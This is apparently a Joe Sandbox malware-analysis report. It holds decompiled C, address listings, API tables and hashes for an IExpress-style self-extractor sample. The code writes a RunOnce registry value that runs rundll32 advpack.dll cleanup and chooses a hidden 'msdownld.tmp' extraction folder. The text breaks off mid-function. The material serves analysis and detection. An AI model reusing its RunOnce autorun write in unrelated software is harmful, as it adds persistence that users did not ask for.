                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                                                                        • Opcode ID: e6d61b903917e7bcdefa97e02637f2bd9cfe311e3407729170b8893fadf618e6
                                                                                                                                                                                                        • Instruction ID: 9a1e0287cd4457860519bff0dcf2ac7e88ef25ade882b7f34ad0a4ef78b8577d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e6d61b903917e7bcdefa97e02637f2bd9cfe311e3407729170b8893fadf618e6
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F99002A525510447D7105B709D1943579915F4D602BC25460A115C4895DB6440819512
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E001F202A(struct HINSTANCE__* __edx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				char _v528;
                                                                                                                                                                                                        				void* _v532;
                                                                                                                                                                                                        				int _v536;
                                                                                                                                                                                                        				int _v540;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t28;
                                                                                                                                                                                                        				long _t36;
                                                                                                                                                                                                        				long _t41;
                                                                                                                                                                                                        				struct HINSTANCE__* _t46;
                                                                                                                                                                                                        				intOrPtr _t49;
                                                                                                                                                                                                        				intOrPtr _t50;
                                                                                                                                                                                                        				CHAR* _t54;
                                                                                                                                                                                                        				void _t56;
                                                                                                                                                                                                        				signed int _t66;
                                                                                                                                                                                                        				intOrPtr* _t72;
                                                                                                                                                                                                        				void* _t73;
                                                                                                                                                                                                        				void* _t75;
                                                                                                                                                                                                        				void* _t80;
                                                                                                                                                                                                        				intOrPtr* _t81;
                                                                                                                                                                                                        				void* _t86;
                                                                                                                                                                                                        				void* _t87;
                                                                                                                                                                                                        				void* _t90;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t91;
                                                                                                                                                                                                        				signed int _t93;
                                                                                                                                                                                                        				void* _t94;
                                                                                                                                                                                                        				void* _t95;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t79 = __edx;
                                                                                                                                                                                                        				_t28 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_v8 = _t28 ^ _t93;
                                                                                                                                                                                                        				_t84 = 0x104;
                                                                                                                                                                                                        				memset( &_v268, 0, 0x104);
                                                                                                                                                                                                        				memset( &_v528, 0, 0x104);
                                                                                                                                                                                                        				_t95 = _t94 + 0x18;
                                                                                                                                                                                                        				_t66 = 0;
                                                                                                                                                                                                        				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                                                                                                                                                        				if(_t36 != 0) {
                                                                                                                                                                                                        					L24:
                                                                                                                                                                                                        					return E001F6CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_push(_t86);
                                                                                                                                                                                                        				_t87 = 0;
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					E001F171E("wextract_cleanup2", 0x50, "wextract_cleanup%d", _t87);
                                                                                                                                                                                                        					_t95 = _t95 + 0x10;
                                                                                                                                                                                                        					_t41 = RegQueryValueExA(_v532, "wextract_cleanup2", 0, 0, 0,  &_v540); // executed
                                                                                                                                                                                                        					if(_t41 != 0) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t87 = _t87 + 1;
                                                                                                                                                                                                        					if(_t87 < 0xc8) {
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					break;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t87 != 0xc8) {
                                                                                                                                                                                                        					GetSystemDirectoryA( &_v528, _t84);
                                                                                                                                                                                                        					_t79 = _t84;
                                                                                                                                                                                                        					E001F658A( &_v528, _t84, "advpack.dll");
                                                                                                                                                                                                        					_t46 = LoadLibraryA( &_v528); // executed
                                                                                                                                                                                                        					_t84 = _t46;
                                                                                                                                                                                                        					if(_t84 == 0) {
                                                                                                                                                                                                        						L10:
                                                                                                                                                                                                        						if(GetModuleFileNameA( *0x1f9a3c,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                        							L17:
                                                                                                                                                                                                        							_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                        							L23:
                                                                                                                                                                                                        							_pop(_t86);
                                                                                                                                                                                                        							goto L24;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						L11:
                                                                                                                                                                                                        						_t72 =  &_v268;
                                                                                                                                                                                                        						_t80 = _t72 + 1;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t49 =  *_t72;
                                                                                                                                                                                                        							_t72 = _t72 + 1;
                                                                                                                                                                                                        						} while (_t49 != 0);
                                                                                                                                                                                                        						_t73 = _t72 - _t80;
                                                                                                                                                                                                        						_t81 = 0x1f91e4;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t50 =  *_t81;
                                                                                                                                                                                                        							_t81 = _t81 + 1;
                                                                                                                                                                                                        						} while (_t50 != 0);
                                                                                                                                                                                                        						_t84 = _t73 + 0x50 + _t81 - 0x1f91e5;
                                                                                                                                                                                                        						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x1f91e5);
                                                                                                                                                                                                        						if(_t90 != 0) {
                                                                                                                                                                                                        							 *0x1f8580 = _t66 ^ 0x00000001;
                                                                                                                                                                                                        							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                                                                                                                                                        							if(_t66 == 0) {
                                                                                                                                                                                                        								_t54 = "%s /D:%s";
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_push("C:\Users\jones\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                        							E001F171E(_t90, _t84, _t54,  &_v268);
                                                                                                                                                                                                        							_t75 = _t90;
                                                                                                                                                                                                        							_t23 = _t75 + 1; // 0x1
                                                                                                                                                                                                        							_t79 = _t23;
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								_t56 =  *_t75;
                                                                                                                                                                                                        								_t75 = _t75 + 1;
                                                                                                                                                                                                        							} while (_t56 != 0);
                                                                                                                                                                                                        							_t24 = _t75 - _t79 + 1; // 0x2
                                                                                                                                                                                                        							RegSetValueExA(_v532, "wextract_cleanup2", 0, 1, _t90, _t24); // executed
                                                                                                                                                                                                        							RegCloseKey(_v532); // executed
                                                                                                                                                                                                        							_t36 = LocalFree(_t90);
                                                                                                                                                                                                        							goto L23;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t79 = 0x4b5;
                                                                                                                                                                                                        						E001F44B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                                                                                                                                                        						goto L17;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                                                                                                                                                        					_t66 = 0 | _t91 != 0x00000000;
                                                                                                                                                                                                        					FreeLibrary(_t84); // executed
                                                                                                                                                                                                        					if(_t91 == 0) {
                                                                                                                                                                                                        						goto L10;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                        						E001F658A( &_v268, 0x104, 0x1f1140);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                        				 *0x1f8530 = _t66;
                                                                                                                                                                                                        				goto L23;
                                                                                                                                                                                                        			}

































                                                                                                                                                                                                        0x001f202a
                                                                                                                                                                                                        0x001f2035
                                                                                                                                                                                                        0x001f203c
                                                                                                                                                                                                        0x001f2041
                                                                                                                                                                                                        0x001f2050
                                                                                                                                                                                                        0x001f205f
                                                                                                                                                                                                        0x001f2064
                                                                                                                                                                                                        0x001f206f
                                                                                                                                                                                                        0x001f208c
                                                                                                                                                                                                        0x001f2094
                                                                                                                                                                                                        0x001f2257
                                                                                                                                                                                                        0x001f2266
                                                                                                                                                                                                        0x001f2266
                                                                                                                                                                                                        0x001f209a
                                                                                                                                                                                                        0x001f209b
                                                                                                                                                                                                        0x001f209d
                                                                                                                                                                                                        0x001f20aa
                                                                                                                                                                                                        0x001f20af
                                                                                                                                                                                                        0x001f20c9
                                                                                                                                                                                                        0x001f20d1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f20d3
                                                                                                                                                                                                        0x001f20da
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f20da
                                                                                                                                                                                                        0x001f20e2
                                                                                                                                                                                                        0x001f2103
                                                                                                                                                                                                        0x001f210e
                                                                                                                                                                                                        0x001f2116
                                                                                                                                                                                                        0x001f2122
                                                                                                                                                                                                        0x001f2128
                                                                                                                                                                                                        0x001f212c
                                                                                                                                                                                                        0x001f2179
                                                                                                                                                                                                        0x001f2194
                                                                                                                                                                                                        0x001f21de
                                                                                                                                                                                                        0x001f21e4
                                                                                                                                                                                                        0x001f2256
                                                                                                                                                                                                        0x001f2256
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f2256
                                                                                                                                                                                                        0x001f2196
                                                                                                                                                                                                        0x001f2196
                                                                                                                                                                                                        0x001f219c
                                                                                                                                                                                                        0x001f219f
                                                                                                                                                                                                        0x001f219f
                                                                                                                                                                                                        0x001f21a1
                                                                                                                                                                                                        0x001f21a2
                                                                                                                                                                                                        0x001f21a6
                                                                                                                                                                                                        0x001f21a8
                                                                                                                                                                                                        0x001f21b0
                                                                                                                                                                                                        0x001f21b0
                                                                                                                                                                                                        0x001f21b2
                                                                                                                                                                                                        0x001f21b3
                                                                                                                                                                                                        0x001f21bc
                                                                                                                                                                                                        0x001f21c7
                                                                                                                                                                                                        0x001f21cb
                                                                                                                                                                                                        0x001f21f1
                                                                                                                                                                                                        0x001f21f6
                                                                                                                                                                                                        0x001f21fd
                                                                                                                                                                                                        0x001f21ff
                                                                                                                                                                                                        0x001f21ff
                                                                                                                                                                                                        0x001f2204
                                                                                                                                                                                                        0x001f2213
                                                                                                                                                                                                        0x001f2218
                                                                                                                                                                                                        0x001f221d
                                                                                                                                                                                                        0x001f221d
                                                                                                                                                                                                        0x001f2220
                                                                                                                                                                                                        0x001f2220
                                                                                                                                                                                                        0x001f2222
                                                                                                                                                                                                        0x001f2223
                                                                                                                                                                                                        0x001f2229
                                                                                                                                                                                                        0x001f223d
                                                                                                                                                                                                        0x001f2249
                                                                                                                                                                                                        0x001f2250
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f2250
                                                                                                                                                                                                        0x001f21d2
                                                                                                                                                                                                        0x001f21d9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f21d9
                                                                                                                                                                                                        0x001f213a
                                                                                                                                                                                                        0x001f2141
                                                                                                                                                                                                        0x001f2144
                                                                                                                                                                                                        0x001f214c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f2163
                                                                                                                                                                                                        0x001f2172
                                                                                                                                                                                                        0x001f2172
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x001f2163
                                                                                                                                                                                                        0x001f20ea
                                                                                                                                                                                                        0x001f20f0
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • memset.MSVCRT ref: 001F2050
                                                                                                                                                                                                        • memset.MSVCRT ref: 001F205F
                                                                                                                                                                                                        • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 001F208C
                                                                                                                                                                                                          • Part of subcall function 001F171E: _vsnprintf.MSVCRT ref: 001F1750
                                                                                                                                                                                                        • RegQueryValueExA.KERNELBASE(?,wextract_cleanup2,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001F20C9
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001F20EA
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 001F2103
                                                                                                                                                                                                        • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001F2122
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 001F2134
                                                                                                                                                                                                        • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001F2144
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 001F215B
                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001F218C
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001F21C1
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001F21E4
                                                                                                                                                                                                        • RegSetValueExA.KERNELBASE(?,wextract_cleanup2,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 001F223D
                                                                                                                                                                                                        • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001F2249
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 001F2250
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                        • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup2
                                                                                                                                                                                                        • API String ID: 178549006-2699677747
                                                                                                                                                                                                        • Opcode ID: 824fed67ca861b1a1df1f4884ce140e03bdda00a22b209605e8437ab00570cf8
                                                                                                                                                                                                        • Instruction ID: c4dcb2f009bf238ceba7c7ae25d6555e1d61694a3ef65e149dd4718664750e06
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 824fed67ca861b1a1df1f4884ce140e03bdda00a22b209605e8437ab00570cf8
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6451D2B1A0421CABDB20AB64DC49FFB7B6DEF54700F4001A4FB49E6191DF759E89CA60
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 232 1f55a0-1f55d9 call 1f468f LocalAlloc 235 1f55fd-1f560c call 1f468f 232->235 236 1f55db-1f55f1 call 1f44b9 call 1f6285 232->236 242 1f560e-1f5630 call 1f44b9 LocalFree 235->242 243 1f5632-1f5643 lstrcmpA 235->243 248 1f55f6-1f55f8 236->248 242->248 246 1f564b-1f5659 LocalFree 243->246 247 1f5645 243->247 250 1f565b-1f565d 246->250 251 1f5696-1f569c 246->251 247->246 254 1f58b7-1f58c7 call 1f6ce0 248->254 252 1f565f-1f5667 250->252 253 1f5669 250->253 255 1f589f-1f58b5 call 1f6517 251->255 256 1f56a2-1f56a8 251->256 252->253 257 1f566b-1f567a call 1f5467 252->257 253->257 255->254 256->255 260 1f56ae-1f56c1 GetTempPathA 256->260 269 1f589b-1f589d 257->269 270 1f5680-1f5691 call 1f44b9 257->270 264 1f56f3-1f5711 call 1f1781 260->264 265 1f56c3-1f56c9 call 1f5467 260->265 274 1f586c-1f5890 GetWindowsDirectoryA call 1f597d 264->274 275 1f5717-1f5729 GetDriveTypeA 264->275 272 1f56ce-1f56d0 265->272 269->254 270->248 272->269 276 1f56d6-1f56df call 1f2630 272->276 274->264 286 1f5896 274->286 278 1f572b-1f572e 275->278 279 1f5730-1f5740 GetFileAttributesA 275->279 276->264 287 1f56e1-1f56ed call 1f5467 276->287 278->279 284 1f5742-1f5745 278->284 279->284 285 1f577e-1f578f call 1f597d 279->285 289 1f576b 284->289 290 1f5747-1f574f 284->290 297 1f57b2-1f57bf call 1f2630 285->297 298 1f5791-1f579e call 1f2630 285->298 286->269 287->264 287->269 292 1f5771-1f5779 289->292 290->292 294 1f5751-1f5753 290->294 296 1f5864-1f5866 292->296 294->292 299 1f5755-1f5762 call 1f6952 294->299 296->274 296->275 308 1f57d3-1f57f8 call 1f658a GetFileAttributesA 297->308 309 1f57c1-1f57cd GetWindowsDirectoryA 297->309 298->289 307 1f57a0-1f57b0 call 1f597d 298->307 299->289 306 1f5764-1f5769 299->306 306->285 306->289 307->289 307->297 314 1f580a 308->314 315 1f57fa-1f5808 CreateDirectoryA 308->315 309->308 316 1f580d-1f580f 314->316 315->316 317 1f5827-1f585c SetFileAttributesA call 1f1781 call 1f5467 316->317 318 1f5811-1f5825 316->318 317->269 323 1f585e 317->323 318->296 323->296
                                                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                                                        			E001F55A0(void* __eflags) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v265;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t28;
                                                                                                                                                                                                        				int _t32;
                                                                                                                                                                                                        				int _t33;
                                                                                                                                                                                                        				int _t35;
                                                                                                                                                                                                        				signed int _t36;
                                                                                                                                                                                                        				signed int _t38;
                                                                                                                                                                                                        				int _t40;
                                                                                                                                                                                                        				int _t44;
                                                                                                                                                                                                        				long _t48;
                                                                                                                                                                                                        				int _t49;
                                                                                                                                                                                                        				int _t50;
                                                                                                                                                                                                        				signed int _t53;
                                                                                                                                                                                                        				int _t54;
                                                                                                                                                                                                        				int _t59;
                                                                                                                                                                                                        				char _t60;
                                                                                                                                                                                                        				int _t65;
                                                                                                                                                                                                        				char _t66;
                                                                                                                                                                                                        				int _t67;
                                                                                                                                                                                                        				int _t68;
                                                                                                                                                                                                        				int _t69;
                                                                                                                                                                                                        				int _t70;
                                                                                                                                                                                                        				int _t71;
                                                                                                                                                                                                        				struct _SECURITY_ATTRIBUTES* _t72;
                                                                                                                                                                                                        				int _t73;
                                                                                                                                                                                                        				CHAR* _t82;
                                                                                                                                                                                                        				CHAR* _t88;
                                                                                                                                                                                                        				void* _t103;
                                                                                                                                                                                                        				signed int _t110;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t28 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_v8 = _t28 ^ _t110;
                                                                                                                                                                                                        				_t2 = E001F468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                                                                                                                                                        				_t109 = LocalAlloc(0x40, _t2);
                                                                                                                                                                                                        				if(_t109 != 0) {
                                                                                                                                                                                                        					_t82 = "RUNPROGRAM";
                                                                                                                                                                                                        					_t32 = E001F468F(_t82, _t109, 1);
                                                                                                                                                                                                        					__eflags = _t32;
                                                                                                                                                                                                        					if(_t32 != 0) {
                                                                                                                                                                                                        						_t33 = lstrcmpA(_t109, "<None>");
                                                                                                                                                                                                        						__eflags = _t33;
                                                                                                                                                                                                        						if(_t33 == 0) {
                                                                                                                                                                                                        							 *0x1f9a30 = 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						LocalFree(_t109);
                                                                                                                                                                                                        						_t35 =  *0x1f8b3e; // 0x0
                                                                                                                                                                                                        						__eflags = _t35;
                                                                                                                                                                                                        						if(_t35 == 0) {
                                                                                                                                                                                                        							__eflags =  *0x1f8a24; // 0x0
                                                                                                                                                                                                        							if(__eflags != 0) {
                                                                                                                                                                                                        								L46:
                                                                                                                                                                                                        								_t101 = 0x7d2;
                                                                                                                                                                                                        								_t36 = E001F6517(_t82, 0x7d2, 0, E001F3210, 0, 0);
                                                                                                                                                                                                        								asm("sbb eax, eax");
                                                                                                                                                                                                        								_t38 =  ~( ~_t36);
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								__eflags =  *0x1f9a30; // 0x0
                                                                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                                                                        									goto L46;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t109 = 0x1f91e4;
                                                                                                                                                                                                        									_t40 = GetTempPathA(0x104, 0x1f91e4);
                                                                                                                                                                                                        									__eflags = _t40;
                                                                                                                                                                                                        									if(_t40 == 0) {
                                                                                                                                                                                                        										L19:
                                                                                                                                                                                                        										_push(_t82);
                                                                                                                                                                                                        										E001F1781( &_v268, 0x104, _t82, "A:\\");
                                                                                                                                                                                                        										__eflags = _v268 - 0x5a;
                                                                                                                                                                                                        										if(_v268 <= 0x5a) {
                                                                                                                                                                                                        											do {
                                                                                                                                                                                                        												_t109 = GetDriveTypeA( &_v268);
                                                                                                                                                                                                        												__eflags = _t109 - 6;
                                                                                                                                                                                                        												if(_t109 == 6) {
                                                                                                                                                                                                        													L22:
                                                                                                                                                                                                        													_t48 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                        													__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                        													if(_t48 != 0xffffffff) {
                                                                                                                                                                                                        														goto L30;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														goto L23;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													__eflags = _t109 - 3;
                                                                                                                                                                                                        													if(_t109 != 3) {
                                                                                                                                                                                                        														L23:
                                                                                                                                                                                                        														__eflags = _t109 - 2;
                                                                                                                                                                                                        														if(_t109 != 2) {
                                                                                                                                                                                                        															L28:
                                                                                                                                                                                                        															_t66 = _v268;
                                                                                                                                                                                                        															goto L29;
                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                        															_t66 = _v268;
                                                                                                                                                                                                        															__eflags = _t66 - 0x41;
                                                                                                                                                                                                        															if(_t66 == 0x41) {
                                                                                                                                                                                                        																L29:
                                                                                                                                                                                                        																_t60 = _t66 + 1;
                                                                                                                                                                                                        																_v268 = _t60;
                                                                                                                                                                                                        																goto L42;
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																__eflags = _t66 - 0x42;
                                                                                                                                                                                                        																if(_t66 == 0x42) {
                                                                                                                                                                                                        																	goto L29;
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	_t68 = E001F6952( &_v268);
                                                                                                                                                                                                        																	__eflags = _t68;
                                                                                                                                                                                                        																	if(_t68 == 0) {
                                                                                                                                                                                                        																		goto L28;
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		__eflags = _t68 - 0x19000;
                                                                                                                                                                                                        																		if(_t68 >= 0x19000) {
                                                                                                                                                                                                        																			L30:
                                                                                                                                                                                                        																			_push(0);
                                                                                                                                                                                                        																			_t103 = 3;
                                                                                                                                                                                                        																			_t49 = E001F597D( &_v268, _t103, 1);
                                                                                                                                                                                                        																			__eflags = _t49;
                                                                                                                                                                                                        																			if(_t49 != 0) {
                                                                                                                                                                                                        																				L33:
                                                                                                                                                                                                        																				_t50 = E001F2630(0,  &_v268, 1);
                                                                                                                                                                                                        																				__eflags = _t50;
                                                                                                                                                                                                        																				if(_t50 != 0) {
                                                                                                                                                                                                        																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																				_t88 =  &_v268;
                                                                                                                                                                                                        																				E001F658A(_t88, 0x104, "msdownld.tmp");
                                                                                                                                                                                                        																				_t53 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                        																				__eflags = _t53 - 0xffffffff;
                                                                                                                                                                                                        																				if(_t53 != 0xffffffff) {
                                                                                                                                                                                                        																					_t54 = _t53 & 0x00000010;
                                                                                                                                                                                                        																					__eflags = _t54;
                                                                                                                                                                                                        																				} else {
                                                                                                                                                                                                        																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																				__eflags = _t54;
                                                                                                                                                                                                        																				if(_t54 != 0) {
                                                                                                                                                                                                        																					SetFileAttributesA( &_v268, 2);
                                                                                                                                                                                                        																					_push(_t88);
                                                                                                                                                                                                        																					_t109 = 0x1f91e4;
                                                                                                                                                                                                        																					E001F1781(0x1f91e4, 0x104, _t88,  &_v268);
                                                                                                                                                                                                        																					_t101 = 1;
                                                                                                                                                                                                        																					_t59 = E001F5467(0x1f91e4, 1, 0);
                                                                                                                                                                                                        																					__eflags = _t59;
                                                                                                                                                                                                        																					if(_t59 != 0) {
                                                                                                                                                                                                        																						goto L45;
                                                                                                                                                                                                        																					} else {
                                                                                                                                                                                                        																						_t60 = _v268;
                                                                                                                                                                                                        																						goto L42;
                                                                                                                                                                                                        																					}
                                                                                                                                                                                                        																				} else {
                                                                                                                                                                                                        																					_t60 = _v268 + 1;
                                                                                                                                                                                                        																					_v265 = 0;
                                                                                                                                                                                                        																					_v268 = _t60;
                                                                                                                                                                                                        																					goto L42;
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																			} else {
                                                                                                                                                                                                        																				_t65 = E001F2630(0,  &_v268, 1);
                                                                                                                                                                                                        																				__eflags = _t65;
                                                                                                                                                                                                        																				if(_t65 != 0) {
                                                                                                                                                                                                        																					goto L28;
                                                                                                                                                                                                        																				} else {
                                                                                                                                                                                                        																					_t67 = E001F597D( &_v268, 1, 1, 0);
                                                                                                                                                                                                        																					__eflags = _t67;
                                                                                                                                                                                                        																					if(_t67 == 0) {
                                                                                                                                                                                                        																						goto L28;
                                                                                                                                                                                                        																					} else {
                                                                                                                                                                                                        																						goto L33;
                                                                                                                                                                                                        																					}
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																			}
                                                                                                                                                                                                        																		} else {
                                                                                                                                                                                                        																			goto L28;
                                                                                                                                                                                                        																		}
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														goto L22;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												goto L47;
                                                                                                                                                                                                        												L42:
                                                                                                                                                                                                        												__eflags = _t60 - 0x5a;
                                                                                                                                                                                                        											} while (_t60 <= 0x5a);
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										goto L43;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t101 = 1;
                                                                                                                                                                                                        										_t69 = E001F5467(0x1f91e4, 1, 3); // executed
                                                                                                                                                                                                        										__eflags = _t69;
                                                                                                                                                                                                        										if(_t69 != 0) {
                                                                                                                                                                                                        											goto L45;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											_t82 = 0x1f91e4;
                                                                                                                                                                                                        											_t70 = E001F2630(0, 0x1f91e4, 1);
                                                                                                                                                                                                        											__eflags = _t70;
                                                                                                                                                                                                        											if(_t70 != 0) {
                                                                                                                                                                                                        												goto L19;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												_t101 = 1;
                                                                                                                                                                                                        												_t82 = 0x1f91e4;
                                                                                                                                                                                                        												_t71 = E001F5467(0x1f91e4, 1, 1);
                                                                                                                                                                                                        												__eflags = _t71;
                                                                                                                                                                                                        												if(_t71 != 0) {
                                                                                                                                                                                                        													goto L45;
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													do {
                                                                                                                                                                                                        														goto L19;
                                                                                                                                                                                                        														L43:
                                                                                                                                                                                                        														GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                        														_push(4);
                                                                                                                                                                                                        														_t101 = 3;
                                                                                                                                                                                                        														_t82 =  &_v268;
                                                                                                                                                                                                        														_t44 = E001F597D(_t82, _t101, 1);
                                                                                                                                                                                                        														__eflags = _t44;
                                                                                                                                                                                                        													} while (_t44 != 0);
                                                                                                                                                                                                        													goto L2;
